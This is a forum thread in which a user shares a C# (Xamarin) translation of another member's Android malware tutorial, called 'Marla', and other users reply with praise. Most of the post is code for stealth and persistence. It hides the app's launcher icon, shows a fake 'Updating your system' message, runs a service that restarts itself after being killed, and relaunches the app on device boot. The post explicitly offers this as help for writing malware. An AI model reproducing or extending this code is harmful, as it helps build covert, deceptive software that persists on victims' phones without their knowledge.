Android Malware: A Tumor called Marla 0x02 [C#]

Malware
, ,
1

Hey mates,
again I translate @L3akM3-0day’s code into C#. See the original article here :wink:.

Hiding App Icon

Main activity

using System;
using Android.App;
using Android.Content;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.OS;

using Android.Content.PM;

namespace Marla
{
    [Activity(Label = "Marla", MainLauncher = true, Icon = "@drawable/icon")]
    public class MainActivity : Activity
    {
        protected override void OnCreate(Bundle bundle)
        {
            base.OnCreate(bundle);

            // The App-hiding line ;)
            PackageManager.SetComponentEnabledSetting(base.ComponentName, ComponentEnabledState.Disabled, ComponentEnableOption.DontKillApp);

            // The Toast
            Toast.MakeText(this, "Updating your system please wait ...", ToastLength.Long);

        }
    }
}

The Service

using System;
using Android.App;
using Android.Content;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.OS;

namespace Marla
{
    [Service]
    public class MainService : Service
    {
        public override StartCommandResult OnStartCommand(Android.Content.Intent intent, StartCommandFlags flags, int startId)
        {
            // Show Toast in UI Thread
            Application.SynchronizationContext.Post(_ => { Toast.MakeText(Android.App.Application.Context, "Malware Started!", ToastLength.Long).Show(); }, null);

            // Restart Service after being closed due to low memory
            return StartCommandResult.Sticky;
        }

        public override IBinder OnBind(Intent intent)
        {
            // We don't need any bindings -> Return null
            return null;
        }
    }
}

BroadcastReceiver

The same as last time :wink:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;

namespace Marla
{
    /// <summary>
    /// Waits for Boot to start the MainActivity
    /// </summary>
    [BroadcastReceiver]
    [IntentFilter(new[] { Intent.ActionBootCompleted })]
    partial class BootReceiver : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            if (intent.Action == Intent.ActionBootCompleted)
            {         
                context.StartActivity(typeof(MainActivity));
            }
        }
    }
}

Conclusion

A very light post about @L3akM3-0day’s malware translated into C#. Maybe this helps someone, who wants to write his malware in another language than (At least hated by me) Java :smile:.

|-TheDoctor-|

4 Likes
2

Nice :slight_smile: This is cool that you translate my code :stuck_out_tongue:

2 Likes
3

I learn some stuff when I translate, e.g. the icon hiding thing could be useful for Argus :wink:, so I have to thank you for the original articles :slight_smile:.

1 Like
4

No problem :slight_smile: Hacking is sharing knowledge

5

Neato-o mate! Nice code! Translated it great too! @L3akM3-0day did a great job with the original, and so did you with the C# version.

2 Likes
6

This topic was automatically closed after 30 days. New replies are no longer allowed.